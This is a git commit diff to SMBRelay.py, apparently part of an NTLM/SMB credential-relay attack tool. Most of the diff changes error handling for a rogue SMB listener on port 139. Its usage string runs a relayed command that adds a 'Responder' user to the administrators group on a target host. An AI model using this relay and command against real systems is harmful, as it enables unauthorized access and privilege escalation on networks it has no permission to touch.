minor changes

2025-07-15 01:22:52 -07:00 · 2014-01-27 22:10:50 -05:00 · 2014-01-27 22:10:50 -05:00 · 4f239a2ef1
commit 4f239a2ef1
parent 583cdb7254
1 changed files with 44 additions and 38 deletions
--- a/SMBRelay.py
+++ b/SMBRelay.py
@ -29,7 +29,7 @@ def UserCallBack(op, value, dmy, parser):
                args.extend(getattr(parser.values, op.dest))
        setattr(parser.values, op.dest, args)

-parser = optparse.OptionParser(usage="python %prog -i 10.20.30.40 -c 'net user Responder Quol0eeP/e}X /add &&net localgroup administrators Responder /add' -t 10.20.30.45 -r ",
+parser = optparse.OptionParser(usage="python %prog -i 10.20.30.40 -c 'net user Responder Quol0eeP/e}X /add &&net localgroup administrators Responder /add' -t 10.20.30.45 -u Administrator lgandx admin",
                               prog=sys.argv[0],
                               )
 parser.add_option('-i','--ip', action="store", help="The ip address to redirect the traffic to. (usually yours)", metavar="10.20.30.40",dest="OURIP")
@ -38,7 +38,7 @@ parser.add_option('-c',action='store', help='Command to run on the target.',meta

 parser.add_option('-t',action="store", help="Target server for SMB relay.",metavar="10.20.30.45",dest="TARGET")

-parser.add_option('-d',action="store", help="Target Domain for SMB relay (optional). This can be set to overwrite a domain logon (DOMAIN\Username) with the gathered credentials.",metavar="WORKGROUP",dest="Domain")
+parser.add_option('-d',action="store", help="Target Domain for SMB relay (optional). This can be set to overwrite a domain logon (DOMAIN\Username) with the gathered credentials. Woks on NTLMv1",metavar="WORKGROUP",dest="Domain")

 parser.add_option('-u', '--UserToRelay', action="callback", callback=UserCallBack, dest="UserToRelay")

@ -198,13 +198,18 @@ def Parse_Nego_Dialect(data):
       return "\x0a\x00"

 def SmbRogueSrv139(key,Target,DomainMachineName):
-   try:
    s = socket(AF_INET,SOCK_STREAM)
    s.setsockopt(SOL_SOCKET,SO_REUSEADDR, 1)
+    s.settimeout(30)
+    try:
       s.bind(('0.0.0.0', 139))
       s.listen(0)
-     s.settimeout(30)
       conn, addr = s.accept()
+    except error, msg:
+       if "Address already in use" in msg:
+          print '\033[31m'+'Something is already listening on TCP 139, did you set SMB = Off in Responder.conf..?\nSMB Relay will not work.'+'\033[0m'
+       
+    try:
       while True:
         data = conn.recv(1024)
         ##session request 139
@ -419,6 +424,7 @@ def RunRelay(host, Command,Domain):
                                     if data[8:10] != "\x2e\x00":
                                        return False

+
 def RunInloop(Target,Command,Domain):
   try:
      while True: